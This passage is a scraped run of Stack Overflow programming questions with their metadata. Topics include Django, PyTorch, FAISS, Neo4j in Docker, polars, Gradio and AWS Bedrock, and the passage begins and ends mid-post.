originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 67, in execute
originor__dev__app | return self._execute_with_wrappers(
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 80, in _execute_with_wrappers
originor__dev__app | return executor(sql, params, many, context)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 89, in _execute
originor__dev__app | return self.cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/utils.py", line 91, in __exit__
originor__dev__app | raise dj_exc_value.with_traceback(traceback) from exc_value
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/django/db/backends/utils.py", line 89, in _execute
originor__dev__app | return self.cursor.execute(sql, params)
originor__dev__app | File "/usr/local/lib/python3.9/site-packages/psycopg/cursor.py", line 723, in execute
originor__dev__app | raise ex.with_traceback(None)
originor__dev__app | django.db.utils.DataError: invalid input syntax for type uuid: "ft_5479ca65374d401d9466d57fc95e4072"
originor__dev__app | LINE 1: ...familytree" WHERE "family_tree_familytree"."id" = 'ft_5479ca...
originor__dev__app | ^
</code></pre>
|
<python><django>
|
2025-01-16 16:29:28
| 0
| 9,922
|
Anuj TBE
|
79,362,317
| 2,082,769
|
Text representation of a list with gaps
|
<p>I have a list of integers that is sorted and contains no duplicates:</p>
<pre><code>mylist = [2, 5,6,7, 11,12, 19,20,21,22, 37,38, 40]
</code></pre>
<p>I want a summarized text representation that shows groups of adjacent integers in a compressed form as a hyphenated pair. To be specific: <em>Adjacent</em> implies magnitude differing by 1. So an integer <em>i</em> is considered to be adjacent to <em>j</em> if <em>j</em> = <em>i</em> ± 1. Recall that the list is sorted. That means that adjacent integers will appear in monotonically increasing series in the list.</p>
<p>So I want some elegant Python that will represent <code>mylist</code> as the string</p>
<pre><code>"2, 5-7, 11-12, 19-22, 37-38, 40,"
</code></pre>
<p>That is,</p>
<ul>
<li>an isolated integer (example: <code>2</code>, because the list contains neither <code>1</code> nor <code>3</code>) is represented as <code>2,</code></li>
<li>a group of adjacent integers (example: <code>19,20,21,22</code> because each member of the group differs from one other member by 1) is represented as <code>‹lowest›-‹highest›,</code> that is <code>19-22,</code>.</li>
</ul>
<p>I can't believe this is a problem nobody has thought important enough to solve. Feel free to point me at a solution I have missed.</p>
|
<python>
|
2025-01-16 16:10:43
| 5
| 17,049
|
BoarGules
|
79,362,308
| 7,347,925
|
How to use skimage to denoise 2d array with nan values?
|
<p>I'm trying to apply the TV filter to 2D array which includes many nan values:</p>
<pre><code>from skimage.restoration import denoise_tv_chambolle
import numpy as np
data_random = np.random.random ([100,100])*100
plt.imshow(data_random)
plt.imshow(denoise_tv_chambolle(data_random))
data_random[20:30, 50:60] = np.nan
data_random[30:40, 55:60] = np.nan
data_random[40:50, 65:75] = np.nan
plt.imshow(denoise_tv_chambolle(data_random))
</code></pre>
<p>The TV filter works well with all valid data, but will return a nan array if there're nan values.</p>
<h2>Original data:</h2>
<img src="https://i.sstatic.net/F5CZ1zVo.png" width="300" height="300"/>
<h2>Deonised data:</h2>
<img src="https://i.sstatic.net/WxqCnayw.png" width="300" height="300"/>
<h2>Data with nan values:</h2>
<img src="https://i.sstatic.net/8uHvulTK.png" width="300" height="300"/>
|
<python><numpy><image-processing><scikit-image><smoothing>
|
2025-01-16 16:09:05
| 1
| 1,039
|
zxdawn
|
79,362,157
| 5,316,326
|
Identify changed directories in Object Storage since a specific datetime with Python
|
<p>Having an s3 object storage, I want to know which directories in a base directory have changed since a give datetime.</p>
<p>It would work similar to <code>get_changed_directories</code>:</p>
<pre class="lang-py prettyprint-override"><code>bucket_directory = "your_bucket_name/base_directory"
since_datetime = datetime(2023, 1, 1, tzinfo=timezone.utc)
changed_dirs = get_changed_directories(s3_client, bucket_directory, since_datetime)
>>> ["your_bucket_name/base_directory/subdir_1", "your_bucket_name/base_directory/subdir_2", "your_bucket_name/base_directory/subdir_4"]
</code></pre>
<p>The <code>s3_client</code> can be any client; for example <code>boto3</code>, but async <code>aiboto3</code> or <code>s3fs</code> is usually faster.</p>
<p><strong>notes</strong></p>
<p>After some experiments, this seems to be the fastest method to list details in a directory:</p>
<pre class="lang-py prettyprint-override"><code>s3_file.ls(directory, detail=True, refresh=True)
</code></pre>
|
<python><boto3><object-storage><python-s3fs><aiobotocore>
|
2025-01-16 15:22:24
| 1
| 4,147
|
Joost Döbken
|
79,362,134
| 13,266,736
|
Docker Custom image neo4j, password login not working
|
<p>I have a custom docker image which looks like this:</p>
<pre class="lang-none prettyprint-override"><code>FROM neo4j:latest
# Copy the script into the container
COPY start-neo4j.sh /start-neo4j.sh
# Make the script executable
RUN chmod +x /start-neo4j.sh
# Run the script as the container's main command
CMD ["/start-neo4j.sh"]
</code></pre>
<p>The idea behind it is just that it helps me create a neo4j instance in docker which does not stop the docker container when the database stops, and for later use I would like to use my custom image.
The startup script looks like this:</p>
<pre><code>#!/bin/bash
# Ensure any failure in the script stops the script
echo "Starting Neo4j with NEO4J_AUTH set to: $NEO4J_AUTH"
# Start Neo4j in the foreground
exec neo4j console
</code></pre>
<p>When I now run the docker container like this:</p>
<pre class="lang-none prettyprint-override"><code> -p 8123:7687 \
-p 8124:7474 \
-e NEO4J_AUTH=neo4j/1234567890 \
--user $(id -u):$(id -g) \
my-neo4j:latest
</code></pre>
<p>with my custom image. It works but when trying to login I cant with the password 1234567890.</p>
<p>Now I sat at this for ours and can't understand what I did wrong so any points are great!</p>
<p>My code to login:</p>
<pre class="lang-py prettyprint-override"><code>from neo4j import GraphDatabase
from neo4j.exceptions import ServiceUnavailable
def connect_to_neo4j(uri="bolt://localhost:8123", user="neo4j", password="1234567890"):
try:
# Create the driver
driver = GraphDatabase.driver(uri, auth=(user, password))
# Verify the connection
with driver.session() as session:
result = session.run("RETURN 'Connected!' as message")
print(result.single()['message'])
return driver
except ServiceUnavailable:
print("Failed to connect to Neo4j. Make sure the database is running.")
return None
except Exception as e:
print(f"An error occurred: {str(e)}")
return None
# Connect to the database
driver = connect_to_neo4j(password="1234567890")
# Don't forget to close the driver when you're done
if driver:
driver.close()
</code></pre>
<p>Which thorws the error: <code>An error occurred: {code: Neo.ClientError.Security.Unauthorized} {message: The client is unauthorized due to authentication failure.}</code></p>
<p>And the logs from docker:</p>
<pre><code>Starting Neo4j with NEO4J_AUTH set to: neo4j/1234567890
Directories in use:
home: /var/lib/neo4j
config: /var/lib/neo4j/conf
logs: /logs
plugins: /var/lib/neo4j/plugins
import: /var/lib/neo4j/import
data: /var/lib/neo4j/data
certificates: /var/lib/neo4j/certificates
licenses: /var/lib/neo4j/licenses
run: /var/lib/neo4j/run
Starting Neo4j.
2025-01-16 15:15:53.874+0000 INFO Logging config in use: File '/var/lib/neo4j/conf/user-logs.xml'
2025-01-16 15:15:53.891+0000 INFO Starting...
2025-01-16 15:15:55.069+0000 INFO This instance is ServerId{76436336} (76436336-1904-4f6f-a898-71082cd5bf7e)
2025-01-16 15:15:56.335+0000 INFO ======== Neo4j 5.26.0 ========
2025-01-16 15:15:59.524+0000 INFO Anonymous Usage Data is being sent to Neo4j, see https://neo4j.com/docs/usage-data/
2025-01-16 15:15:59.610+0000 INFO Bolt enabled on 0.0.0.0:7687.
2025-01-16 15:16:00.315+0000 INFO HTTP enabled on 0.0.0.0:7474.
2025-01-16 15:16:00.316+0000 INFO Remote interface available at http://localhost:7474/
2025-01-16 15:16:00.319+0000 INFO id: F5093BC561A00396AE5C94FA9F710E9085F0EA09F30D6B5B087DE9CC1AF9C7EF
2025-01-16 15:16:00.319+0000 INFO name: system
2025-01-16 15:16:00.319+0000 INFO creationDate: 2025-01-16T15:15:57.733Z
2025-01-16 15:16:00.320+0000 INFO Started.
2025-01-16 15:16:03.399+0000 WARN [bolt-0] The client is unauthorized due to authentication failure.
</code></pre>
<p>thanks!</p>
|
<python><docker><neo4j>
|
2025-01-16 15:15:38
| 2
| 1,015
|
SebNik
|
79,361,940
| 24,696,572
|
Forward pass with all samples
|
<pre><code>import torch
import torch.nn as nn
class PINN(nn.Module):
def __init__(self, input_dim, output_dim, hidden_layers, neurons_per_layer):
super(PINN, self).__init__()
layers = []
layers.append(nn.Linear(input_dim, neurons_per_layer))
for _ in range(hidden_layers):
layers.append(nn.Linear(neurons_per_layer, neurons_per_layer))
layers.append(nn.Linear(neurons_per_layer, output_dim))
self.network = nn.Sequential(*layers)
def forward(self, x):
return self.network(x)
# Example: generating random input data
inputs = torch.rand((1000, 3)) # 3D input coordinates
model = PINN(input_dim=3, output_dim=3, hidden_layers=4, neurons_per_layer=64)
optimizer = torch.optim.Adam(model.parameters(), lr=0.001)
epochs = 10000
for epoch in range(epochs):
optimizer.zero_grad()
nn_output = model(inputs) # Compute the NN prediction
# Compute e.g gradient of nn_output
loss.backward()
optimizer.step()
</code></pre>
<p>I want to implement a physics-informed NN where the inputs are <code>N</code> 3d points (x,y,z) and the NN output is a vector-valued quantitiy at this point, that is, both input dimension and output dimension are the same.</p>
<p>To calculate the loss at every epoch, I need to have the value of the quantity at all points. Example: For <code>N=1000</code>points, I need all <code>1000</code> NN-predictions before I can proceed with the loss calculation.
In my code, I am basically giving a <code>1000x3</code> object to the input layer assuming that pytorch passes each row (<code>1x3</code>) separately to the network and at the end organizes it again as an <code>1000x3</code>object.</p>
<p>Does pytorch work like that or do I have to rethink this approach?</p>
|
<python><machine-learning><pytorch>
|
2025-01-16 14:23:21
| 1
| 332
|
Mathieu
|
79,361,844
| 9,591,312
|
Issue with Conda Package Installation - Intel Channel Persistence
|
<h2>Environment</h2>
<ul>
<li>Using Miniconda for Python package management</li>
</ul>
<h2>Current Situation</h2>
<ol>
<li>All configured channels are visible in <code>conda info</code> output and Intel is removed:
<a href="https://i.sstatic.net/3b89XzlD.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/3b89XzlD.jpg" alt="output of conda info" /></a></li>
<li>During package installation, Conda attempts to use the deprecated Intel channel
<a href="https://i.sstatic.net/fzbcEsN6.jpg" rel="nofollow noreferrer"><img src="https://i.sstatic.net/fzbcEsN6.jpg" alt="fail conda installation" /></a></li>
<li>Installation fails due to the non-existent Intel channel</li>
</ol>
<h2>What I've Tried</h2>
<ul>
<li>Removed Intel channel from all configuration files</li>
<li>The channel still persists in Conda's configuration</li>
</ul>
<h2>Question</h2>
<p>How can I completely remove the Intel channel from Conda's configuration without reinstalling Conda?</p>
<h2>Additional Details</h2>
<ul>
<li>I previously used the Intel channel but it's no longer active</li>
<li>The channel remains configured despite removing it from <code>.condarc</code></li>
</ul>
<p>Please let me know if you need any additional information to help resolve this issue.</p>
|
<python><anaconda><intel><miniconda><mamba>
|
2025-01-16 13:52:29
| 0
| 647
|
BayesianMonk
|
79,361,674
| 11,751,799
|
Subplot four-pack under another subplot the size of the four-pack
|
<p>I want to make a <code>matplotlib</code> figure that has two components:</p>
<ol>
<li><p>A 2x2 "four pack" of subplots in the lower half of the figure</p>
</li>
<li><p>A subplot above the four pack that is the size of the four pack.</p>
</li>
</ol>
<p>I have seen <a href="https://stackoverflow.com/a/35881382/11751799">this</a> answer where subplots can have different dimensions. How can that approach be tweaked when there are multiple columns and rows, however? Or is a completely different approach warranted?</p>
<p>My final figure should be arranged something like this:</p>
<p><a href="https://i.sstatic.net/ndZxrcPN.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/ndZxrcPN.png" alt="big plot above four pack" /></a></p>
<p>If there is a straightforward way to have a left-right oritentation, shown below, that would be helpful, too.</p>
<p><a href="https://i.sstatic.net/nSqjcD7P.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/nSqjcD7P.png" alt="big plot left of four pack" /></a></p>
|
<python><matplotlib><plot><graph>
|
2025-01-16 13:01:03
| 2
| 500
|
Dave
|
79,361,450
| 10,889,650
|
django_apscheduler calls my job many times
|
<p>I have a scheduler python package with this main file:</p>
<pre><code>from apscheduler.schedulers.background import BackgroundScheduler
from django_apscheduler.jobstores import DjangoJobStore, register_events
from django.utils import timezone
from django_apscheduler.models import DjangoJobExecution
import sys
# This is the function you want to schedule - add as many as you want and then register them in the start() function below
def scheduled_function():
print("my function is running as scheduled")
def start():
scheduler = BackgroundScheduler()
scheduler.add_jobstore(DjangoJobStore(), "default")
scheduler.remove_all_jobs()
scheduler.add_job(scheduled_function, 'interval', seconds=10, name='scheduled_function', jobstore='default')
scheduler.start()
scheduler.print_jobs()
</code></pre>
<p>I call it from my apps.py like this:</p>
<pre><code>from django.apps import AppConfig
import os
class MyAppConfig(AppConfig):
default_auto_field = 'django.db.models.BigAutoField'
name = 'my_server_app'
def ready(self):
if os.environ["RUN_MAIN"]:
from my_app.scheduler import scheduler
scheduler.start()
</code></pre>
<p>Despite calling remove_all_jobs, my function is called many times. For example, the output of my print_jobs call looks like this after I've restarted django a few times:</p>
<pre><code>Jobstore default:
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:43:56 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:43:56 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:43:56 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:01 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:02 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:03 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:04 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:05 UTC)
scheduled_function (trigger: interval[0:00:10], next run at: 2025-01-16 11:44:05 UTC)
</code></pre>
<p>How can I fully clear the state of the scheduler whenever start is called?</p>
|
<python><django><django-apscheduler>
|
2025-01-16 11:48:22
| 1
| 1,176
|
Omroth
|
79,361,321
| 19,959,092
|
How to improve faiss results?
|
<p>I am currently writing a program in which I need to retrieve information from a rag. this information should then be used by an llm. I am using FAISS in a python environment with the Langchain wrapper.</p>
<p>The data source is a document with regularities, which I split into individual texts based on the paragraphs. this allows me to ensure that the text is coherent for each topic.</p>
<p>However, I now have the problem that the database gives me quite strange results. if I ask in the database (e.g. topic obs) how to peel a banana, I get results that deal, for example, with the best way to plant a kiwi.</p>
<p>accordingly, the results don't help me much and i'm wondering how i can improve them.</p>
<p>here is my code:</p>
<p>the input of the search method is mostly 1 sentence, which contains a question.
the search method should then return one or 2 documents.</p>
<pre><code>import logging
import os
from pathlib import Path
import PyPDF2
from langchain_core.documents import Document
from langchain_community.document_loaders import TextLoader
from langchain_text_splitters import CharacterTextSplitter
from langchain_community.vectorstores import FAISS
from langchain_community.embeddings import HuggingFaceEmbeddings
from tqdm import tqdm
logging.basicConfig(
level=logging.INFO,
filename="logs/api.log",
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s"
)
logger = logging.getLogger(__name__)
class FaissConnection:
_instance = None
def __new__(cls):
if cls._instance is None:
cls._instance = super(FaissConnection, cls).__new__(cls)
cls._instance._initialize()
return cls._instance
def _initialize(self):
"""Initializes the FAISS connection, loading and processing the PDF."""
# Load and filter documents
character_chunks += self.get_regulation_chunks()
self.embeddings = HuggingFaceEmbeddings()
logging.info("Text split into %d chunks successfully.", len(character_chunks))
# Create FAISS index
self.db = FAISS.from_documents(character_chunks, self.embeddings)
logging.info("FAISS index created successfully.")
@staticmethod
def get_regulation_chunks() -> list[Document]:
"""Returns the regulation documents."""
documents = FaissConnection.get_regulation_documents()
logging.info("Text extracted from PDF file successfully. Total pages: %d", len(documents))
text_splitter = CharacterTextSplitter(separator="\n§")
character_chunks = text_splitter.split_documents(documents)
return character_chunks
@staticmethod
def get_regulation_documents() -> list[Document]:
"""Returns the regulation documents."""
current_file = Path(__file__).resolve()
project_root = current_file.parents[2]
pdf_path = project_root / "resources" / "document.pdf"
if not pdf_path or not os.path.exists(pdf_path):
raise FileNotFoundError("the file does not exist.")
documents = FaissConnection.load_pdf_from_file(pdf_path)
# filter all docs with less than 100 characters
documents = [doc for doc in documents if len(doc.page_content) > 100]
return documents
@staticmethod
def load_pdf_from_file(file_path: str) -> list[Document]:
"""Loads text from a PDF file."""
if not os.path.exists(file_path):
raise FileNotFoundError(f"The file {file_path} does not exist.")
documents = []
reader = PyPDF2.PdfReader(file_path)
progress_bar = tqdm(range(len(reader.pages)), desc="Reading PDF pages")
for page_num in progress_bar:
page = reader.pages[page_num]
text = page.extract_text()
document = Document(page_content=text)
documents.append(document)
return documents
def search(self, query, return_amount=1):
"""
Searches the FAISS index with the given query and returns the most relevant documents.
Args:
query (str): The search query.
return_amount (int): Number of documents to return.
Returns:
list[Document]: List of relevant documents.
"""
retriever = self.db.as_retriever(search_type="mmr")
retriever.search_kwargs["k"] = return_amount # Limit results
#docs = retriever.get_relevant_documents(query)
docs = retriever.invoke(query) #TODO:test difference
logging.info("Search query executed. Returning top %d result(s).", return_amount)
for doc in docs:
logging.info("Document: %s", doc.page_content)
return docs[0] if return_amount == 1 else docs
if __name__ == "__main__":
# Create the singleton instance
faiss_instance = FaissConnection()
# Example of using the singleton instance to retrieve relevant documents
relevant_docs = faiss_instance.search("How to peel a Banana?", return_amount=2)
</code></pre>
|
<python><langchain><faiss>
|
2025-01-16 11:00:29
| 0
| 428
|
Pantastix
|
79,361,227
| 3,491,759
|
I am getting "An error occurred (resourceNotFoundException) when calling the InvokeAgent operation: Knowledge Base with id 7M7ACWA9BQ does not exist"
|
<p>I am trying to invoke an agent I built in an agent builder. The agent works fine in the aws console and was trying to make a call to it using a Python code as is below</p>
<pre><code>def invoke_agent(prompt: str):
"""
Sends a prompt for the agent to process and respond to.
:param agent_id: The unique identifier of the agent to use.
:param agent_alias_id: The alias of the agent to use.
:param session_id: The unique identifier of the session. Use the same value across requests
to continue the same conversation.
:param prompt: The prompt that you want Claude to complete.
:return: Inference response from the model.
"""
agents_runtime_client = boto3.client('bedrock-agent-runtime',
aws_access_key_id=all_values['aws_access_key_id'],
aws_secret_access_key=all_values['aws_secret_access_key'],
region_name="us-east-1")
try:
# Note: The execution time depends on the foundation model, complexity of the agent,
# and the length of the prompt. In some cases, it can take up to a minute or more to
# generate a response.
response = agents_runtime_client.invoke_agent(
agentId='**********',
agentAliasId='**********',
sessionId='session_id',
inputText=prompt,
)
completion = ""
for event in response.get("completion"):
chunk = event["chunk"]
completion = completion + chunk["bytes"].decode()
except ClientError as e:
logger.error(f"Couldn't invoke agent. {e}")
raise e
return completion
</code></pre>
<p>but I keep getting this error with the ending part of stack trace below</p>
<pre><code>File "/opt/homebrew/lib/python3.11/site-packages/botocore/eventstream.py", line 619, in _parse_event
raise EventStreamError(parsed_response, self._operation_name)
botocore.exceptions.EventStreamError: An error occurred (resourceNotFoundException) when calling the InvokeAgent operation: Knowledge Base with id 7M7ACWA9BQ does not exist
</code></pre>
<p>The error was even more confusing as the line that says <code>Knowledge Base with id 7M7ACWA9BQ does not exist</code> is strange as I don't have a knowledge base attached while it works fine in aws console(in the bedrock play area where I set the agent up). I had set the agent up earlier with a knowledge base which I removed when the OpenSearch cost was not all that cool for me to retain but not sure it has the said ID either as I removed it long before starting to build out a code to invoke the agent. I have added a knowledge base to the agent when I get the error but it still doesn't solve it.</p>
<p>What am I doing wrong and how to solve it?</p>
|
<python><amazon-web-services><artificial-intelligence><boto3><amazon-bedrock>
|
2025-01-16 10:39:55
| 1
| 441
|
olyjosh
|
79,361,220
| 3,070,181
|
Why does pyinstaller generated exe fail with module not found giving a strange module name?
|
<p>I am running pyinstaller 6.8.0 on Windows 10</p>
<p>my application runs correctly when called from the terminal (python .../main.py)</p>
<p>I can build it using pyinstaller with no error messages</p>
<p>When I run the exe it fails with the error</p>
<blockquote>
<p>File "psiconfig\toml_config.py", line 2, in
ModuleNotFoundError: No module named '3c22db458360489351e4__mypyc'</p>
</blockquote>
<p>Line 2 of tomli_config,py is:</p>
<p>import toml</p>
<p>If I run python REPL I am able to import tomli with no errors</p>
<p>this is my spec file</p>
<pre><code># -*- mode: python ; coding: utf-8 -*-
a = Analysis(
['C:\\Users\\jeffw\\projects\\basic_app\\basic_app\\src\\main.py'],
pathex=[],
binaries=[],
datas=[('basic_app/images/icon.png', 'images')],
hiddenimports=['tomli'],
hookspath=[],
hooksconfig={},
runtime_hooks=[],
excludes=[],
noarchive=False,
optimize=0,
)
pyz = PYZ(a.pure)
exe = EXE(
pyz,
a.scripts,
a.binaries,
a.datas,
[],
name='BasicApp.exe',
debug=False,
bootloader_ignore_signals=False,
strip=False,
upx=True,
upx_exclude=[],
runtime_tmpdir=None,
console=False,
disable_windowed_traceback=False,
argv_emulation=False,
target_arch=None,
codesign_identity=None,
entitlements_file=None,
icon=['basic_app\\images\\icon.ico'],
)
</code></pre>
<p>How do I solve this?</p>
|
<python><pyinstaller>
|
2025-01-16 10:37:09
| 3
| 3,841
|
Psionman
|
79,360,975
| 12,466,687
|
How to color nodes in network graph based on categories in networkx python?
|
<p>I am trying to create a <strong>network graph</strong> on <strong>correlation data</strong> and would like to <strong>color the nodes based on categories</strong>.</p>
<p><strong>Data sample view:</strong>
<a href="https://i.sstatic.net/KnVonnbG.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/KnVonnbG.png" alt="enter image description here" /></a></p>
<p><strong>Data</strong>:</p>
<pre><code>import pandas as pd
links_data = pd.read_csv("https://raw.githubusercontent.com/johnsnow09/network_graph/refs/heads/main/links_filtered.csv")
</code></pre>
<p><strong>graph code:</strong></p>
<pre><code>import networkx as nx
G = nx.from_pandas_edgelist(links_data, 'var1', 'var2')
# Plot the network:
nx.draw(G, with_labels=True, node_color='orange', node_size=200, edge_color='black', linewidths=.5, font_size=2.5)
</code></pre>
<p><a href="https://i.sstatic.net/AWnxSV8J.png" rel="nofollow noreferrer"><img src="https://i.sstatic.net/AWnxSV8J.png" alt="enter image description here" /></a></p>
<p>All the nodes in this network graph is colored as orange but I would like to <strong>color them</strong> based on <code>Category</code> variable. I have looked for more examples but not sure how to do it.</p>
<p>I am also open to using other python libraries if required.</p>
<p>Appreciate any help here !!</p>
|
<python><networkx>
|
2025-01-16 09:24:11
| 1
| 2,357
|
ViSa
|
79,360,971
| 2,287,458
|
Rename all columns to lowercase in Polars dataframe
|
<p>Given a <code>polars</code> dataframe I want to rename all columns to their lowercase version. As per <a href="https://docs.pola.rs/api/python/stable/reference/expressions/api/polars.Expr.name.to_lowercase.html" rel="nofollow noreferrer">polars.Expr.name.to_lowercase</a> we can do</p>
<pre class="lang-py prettyprint-override"><code>import polars as pl
pl.DataFrame([{'CCY': 'EUR', 'Qty': 123},
{'CCY': 'USD', 'Qty': 456}]).with_columns(pl.all().name.to_lowercase())
</code></pre>
<p>but this duplicates the data (as it keeps the original column names).</p>
<p>Conceptually, I am looking for something like</p>
<pre class="lang-py prettyprint-override"><code>pl.DataFrame(...).rename({c: c.name.to_lowercase() for c in pl.all()})
</code></pre>
<p>But this doesn't work since <code>pl.all()</code> is not iterable.</p>
|
<python><dataframe><python-polars>
|
2025-01-16 09:22:20
| 3
| 3,591
|
Phil-ZXX
|
79,360,623
| 1,553,662
|
gradio UI Button and Image, image not shown after processing
|
<p>I'm building a video analysis tool using Gradio as UI.
in the UI there is a dropdown and a textbox to select a local video, and some parameters to put in the text.</p>
<p>After clicking the load button, the process start but at the end the image output is not shown in the UI.</p>
<p><strong>Relevant notes</strong></p>
<ul>
<li>I reduced the code as much as possible to remove all support functions to list/filter content</li>
</ul>
<p><strong>Code</strong></p>
<pre><code>import gradio as gr
def process_selection(selection, queries):
print("I reach here. This is a long function that after a while returns an image")
return "/local_path_to_image/output.png" # or return Pil.Image object
with gr.Blocks() as demo:
with gr.Row():
with gr.Column():
with gr.Group():
input_dropdown = gr.Dropdown(
choices=get_video_files(), # fn omitted from code brevity
label="Select Input Image",
interactive=True,
allow_custom_value=True,
filterable=True
)
queries = gr.Textbox(
label="Input queries (one per line)",
lines=5,
max_lines=10,
)
load_btn = gr.Button("Load Video")
output_image = gr.Image(label="Output")
load_btn.click(
fn=process_selection,
inputs=[input_dropdown, queries],
outputs=output_image,
show_progress="full" # no progress is shown whatsoever...
)
input_dropdown.input(
fn=filter_files, # fn omitted from code brevity
inputs=input_dropdown,
outputs=input_dropdown
)
</code></pre>
|
<python><gradio>
|
2025-01-16 06:57:35
| 0
| 1,581
|
Stormsson
|
79,360,591
| 10,209,763
|
SSL Certificate Verification Failed with Sendgrid send
|
<p>I am getting an SSL verification failed error when trying to send emails with the Sendgrid web api. I'm not even sure what cert it is trying to verify here. I have done all of the user and domain verification on my Sendgrid account and I am using very straightforward sending process.</p>
<p>Here the error</p>
<pre><code>urllib.error.URLError: <urlopen error [SSL: CERTIFICATE_VERIFY_FAILED] certificate verify failed: self-signed certificate in certificate chain (_ssl.c:1000)>
</code></pre>
<p>Heres the code</p>
<pre><code>mailClient = SendGridAPIClient(os.environ.get('sendGridKey'))
message = Mail(
from_email=os.environ['sendGridEmail'],
to_emails="dev@cribbi.co",
subject="User Message for %s" %newMessage['chatId'],
html_content = "<strong>" + newMessage['message']['text'] + "</strong>"
)
mailRes = mailClient.send(message)
</code></pre>
|
<python><python-3.x><sendgrid>
|
2025-01-16 06:42:22
| 1
| 312
|
Mitchell Leefers
|
79,360,261
| 210,867
|
Why does `list()` call `__len__()`?
|
<p>The setup code:</p>
<pre class="lang-py prettyprint-override"><code>class MyContainer:
def __init__(self):
self.stuff = [1, 2, 3]
def __iter__(self):
print("__iter__")
return iter(self.stuff)
def __len__(self):
print("__len__")
return len(self.stuff)
mc = MyContainer()
</code></pre>
<p>Now, in my shell:</p>
<pre class="lang-py prettyprint-override"><code>>>> i = iter(mc)
__iter__
>>> [x for x in i]
[1, 2, 3]
>>> list(mc)
__iter__
__len__
[1, 2, 3]
</code></pre>
<p>Why is <code>__len__()</code> getting called by <code>list()</code>? And where is that documented?</p>
|
<python><list>
|
2025-01-16 03:01:17
| 1
| 8,548
|
odigity
|
79,360,171
| 5,755,266
|
Is there a better way to use zip with an arbitrary number of iters?
|
<p>With a set of data from an arbitrary set of lists (or dicts or other iter), I want to create a new list or tuple that has all the first entries, then all the 2nd, and so on, like an hstack.</p>
<p>If I have a known set of data, I can zip them together like this:</p>
<pre><code>data = {'2015': [2, 1, 4, 3, 2, 4],
'2016': [5, 3, 3, 2, 4, 6],
'2017': [3, 2, 4, 4, 5, 3]}
hstack = sum(zip(data['2015'], data['2016'], data['2017']), ())
print(hstack)
# hstack: (2, 5, 3, 1, 3, 2, 4, 3, 4, 3, 2, 4, 2, 4, 5, 4, 6, 3)
</code></pre>
<p>But what if I don't know how many entries (or the keys) of the dict?</p>
<p>For processing an arbitrary set of iterators, I tried:</p>
<pre><code>combined_lists = sum(zip(data[val] for val in data.keys()), ())
# combined_lists: ([2, 1, 4, 3, 2, 4], [5, 3, 3, 2, 4, 6], [3, 2, 4, 4, 5, 3])
</code></pre>
<p>And also:</p>
<pre><code>nums = sum(zip(num for val in data.keys() for num in data[val]), ())
# nums: (2, 1, 4, 3, 2, 4, 5, 3, 3, 2, 4, 6, 3, 2, 4, 4, 5, 3)
</code></pre>
<p>But both of these just keep the same order I could get from adding the sequences together.</p>
<p>I was able to get it to work with:</p>
<pre><code>counts = []
entry = list(data.keys())[0]
for idx, count in enumerate(data[entry]):
for val in list(data.keys()):
counts.append(data[val][idx])
# counts: [2, 5, 3, 1, 3, 2, 4, 3, 4, 3, 2, 4, 2, 4, 5, 4, 6, 3]
</code></pre>
<p>Which is fine, but it's a bit bulky. Seems like there should be a better way.</p>
<p>Is there a way with list comprehension or some feature of zip that I missed?</p>
<p>No imports preferred.</p>
|
<python>
|
2025-01-16 01:55:56
| 3
| 535
|
Zim
|
79,360,156
| 3,614,648
|
Why do different prompts affect how I can run Python code in VSCode?
|
<p>In VSCode, I can run Python code from a .py file by selecting the code in the editor then typing shift+enter. It runs without error and opens a Python terminal (prompt turns to <code>>>></code>). However, when my prompt turns to <code>>>></code>, the below approaches to running code produce both <code>SyntaxError: invalid syntax</code> and <code>KeyboardInterrupt</code> errors:</p>
<ul>
<li>Left-clicking the arrow button near the top right of the screen and selecting "Run Python File"</li>
<li>Right-clicking the editor and selecting "Run Python File in Terminal"</li>
</ul>
<p>Other approaches involving the arrow button, right-clicking the editor, or use of shift+enter do not produce these errors. Additionally, if I use any approach that doesn't produce the <code>>>></code> prompt, none of these produce an error.</p>
<p>Can anyone explain what is going on? I can't find any documentation explaining what is happening with the terminal and how it relates to these errors. FWIW, I'm working with a virtual environment containing only <code>numpy</code>.</p>
<p>Here's an example .py file:</p>
<pre class="lang-py prettyprint-override"><code>import numpy as np
msg = "Roll a dice!" # in-line comment
print(msg)
print(np.random.randint(1,9))
print(5+5) # in-line comment
</code></pre>
|
<python><visual-studio-code><terminal><prompt>
|
2025-01-16 01:47:32
| 1
| 4,312
|
socialscientist
|
79,360,047
| 3,841,699
|
Issue with Django CheckConstraint
|
<p>I'm trying to add some new fields to an existing model and also a constraint related to those new fields:</p>
<pre class="lang-py prettyprint-override"><code>class User(models.Model):
username = models.CharField(max_length=32)
# New fields ##################################
has_garden = models.BooleanField(default=False)
garden_description = models.CharField(
max_length=32,
null=True,
blank=True,
)
class Meta:
constraints = [
models.CheckConstraint(
check=Q(has_garden=models.Value(True))
& Q(garden_description__isnull=True),
name="garden_description_if_has_garden",
)
]
</code></pre>
<p>The problem is that when I run my migrations I get the following error:</p>
<pre><code>django.db.utils.IntegrityError: check constraint "garden_description_if_has_garden" is violated by some row
</code></pre>
<p>But I don't understand how the constraint is being violated if no <code>User</code> has a <code>has_garden</code>, the field is just being created and also its default value is <code>False</code> 🤔.</p>
<p>I'm using django 3.2 with postgresql.</p>
<p><strong>What is the proper way to add this constraint?</strong> If it's of any use here's the autogenerated migration:</p>
